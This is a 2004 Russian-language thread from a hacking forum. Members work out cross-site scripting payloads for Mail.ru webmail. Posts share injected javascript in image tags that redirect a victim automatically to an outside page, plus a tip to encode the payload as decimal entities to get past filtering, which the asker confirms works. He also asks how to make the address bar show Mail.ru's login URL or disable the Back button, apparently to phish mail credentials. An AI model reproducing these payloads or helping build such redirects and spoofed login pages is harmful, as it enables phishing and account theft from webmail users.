HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Mail.ru: два глупых вопроса
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mail.ru: два глупых вопроса
  #1  
Старый 14.12.2004, 06:50
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
С нами: 11265863

Репутация: 0
Question Mail.ru: два глупых вопроса
1.
Ну, допустим, есть скрипт:
<image src=javascript&#10:alert(xss)>
Действительно работает (в смысле alert выдает).

Но вот что писать вместо [alert(xss)] если мне надо замутить редирект на http://pupkin.ru/vasya.html (автоматически и в том же окне)?
Пытался сделать так:
<image src=javascript&#10:document.location.replace('http://pupkin.ru/vasya.html')>
или
<image src=javascript&#10:onLoad=window.location=("http://pupkin.ru/vasya.html")>
Без мазы.
Есть подозрения, что я облажался с синтаксисом.

Есть еще такая штука:
<SCRIPT type="text/javascript" LANGUAGE="JavaScript">
<!--
if (self.parent.frames.length == 0)
self.parent.location="http://pupkin.ru/vasya.html";
// -->
</SCRIPT>
Но как это все оформить в одну строчку???



2.
А кто-нибудь знает можно ли заменить в адресной строке [http://pupkin.ru/vasya.html] например на [http://win.mail.ru/cgi-bin/auth] или хотя бы отключить кнопку "Back"?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.12.2004, 00:22
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию
короче, двигай сюда http://antichat.ru/crackchat/HTML/ и кодируй строку
Цитата:
document.location.replace
в 10-ичную кодировку, и все получится...
 
Ответить с цитированием

virgoz, спасибо за подсказку!
  #3  
Старый 15.12.2004, 05:20
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
С нами: 11265863

Репутация: 0
По умолчанию virgoz, спасибо за подсказку!
ИЕС. Я СДЕЛАЛ ЭТО!

Но все-таки повторю свой второй вопрос (может кто знает):

Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?

Есть ли у кого на примете скрипты для этого?
 
Ответить с цитированием

  #4  
Старый 15.12.2004, 12:30
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
С нами: 11270344

Репутация: 0
По умолчанию
2govorunov
А ты на какой почте юзал?
 
Ответить с цитированием

  #5  
Старый 15.12.2004, 17:46
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию
Цитата:
Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?
зайди на rootlab.ru, покрути там новостную ленту, все будет написано...
 
Ответить с цитированием

  #6  
Старый 16.12.2004, 06:42
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
С нами: 11270344

Репутация: 0
По умолчанию
Подскажите почему не срабатывает <image src=javascript&#10:document.location.replace('http://pupkin.ru/va sya.html')>
 
Ответить с цитированием

  #7  
Старый 16.12.2004, 06:46
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
С нами: 11270344

Репутация: 0
По умолчанию
да уж.... там было все 10-тичной кодировки ....так работает отправляю с Outlook на mail.ru как HTML открываю ящик и ничего...кроме текста.... что тут не так ?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.